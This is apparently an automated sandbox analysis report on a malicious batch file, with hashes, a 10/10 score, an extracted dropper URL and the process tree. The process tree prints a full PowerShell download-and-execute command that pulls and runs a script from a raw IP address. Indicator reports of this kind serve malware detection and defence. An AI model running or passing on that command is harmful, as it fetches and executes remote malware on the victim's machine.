Analysis
-
max time kernel
109s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
01-04-2020 17:10
General
-
Target
mUNetnda.bat
-
Size
190B
-
MD5
8d47ed92c538cfd43a00b6489d8b4af4
-
SHA1
f5b96923c6ba26d2cc1b8d7931c713ced4c9a8b3
-
SHA256
fdb71ddc395ffaf887e8f74472c3d02d098a948b96eb4a022f8ab36d3232a507
-
SHA512
18a320853db978eae913be9170806265455a882d72f2a853d4747623a6940240824c3ed952457fea512ec6d9ef3f7fd2b2f790dccf904c205594cf2e06eb4586
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/mUNetnda
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mUNetnda.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/mUNetnda');Invoke-LISWYRT;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB